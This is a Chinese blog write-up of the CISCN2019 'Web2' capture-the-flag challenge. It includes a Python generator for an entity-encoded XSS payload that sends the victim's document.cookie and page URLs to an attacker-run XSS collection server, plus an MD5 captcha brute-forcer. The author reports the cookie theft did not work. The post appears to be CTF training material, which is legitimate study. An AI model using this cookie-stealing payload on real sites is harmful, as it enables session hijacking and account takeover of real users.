[CISCN2019 华东北赛区]Web2

文章讲述了在CISCN2019华东北区比赛中的安全挑战,作者发现了一个XSS漏洞并尝试利用它获取管理员cookie,同时提到了使用自建平台的过程。后续尝试包括MD5哈希破解和SQL注入,但未能成功获取PHPSESSID。
摘要由CSDN通过智能技术生成

[CISCN2019 华东北赛区]Web2

  • 随便注册一个登录,发现
    image.png
  • 还有反馈页面,一看就知道大概率是xss,应该是为了得到管理员cookie
  • 扫描了一下,果然有admin.php后台登录
    image.png
  • buu可以连接访问外网了,所以内部的xss平台关闭了,使用自己搭建的莲花平台,不过需要一个服务器

自己搭建的xss平台使用

搭建

参考
https://blog.csdn.net/weixin_44652484/article/details/134169568
搭建非常简单

使用

image.png
根据其他人的题解
payload

xss='''(function(){window.location.href='http://ip/xss_platform/?location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''  
output = ""  
for c in xss:  
output += "&#" + str(ord(c))  
  
print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")
  • 然后提交文章,得到连接,来到反馈页面
    image.png
  • 说了要将域名改成web
    验证码
import hashlib
num=input()
for i in range(999999,10000000):
    m=hashlib.md5()
    m.update(str(i).encode())
    m=m.hexdigest()
    if m[:6]==num:
        print(i)
        break
  • 然后我得不到管理员的cookie啊,算了,反正思路是这样的,有没有大佬知道为什么的
  • 得到phpsessid之后登录,然后就是一个简单的sql注入
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值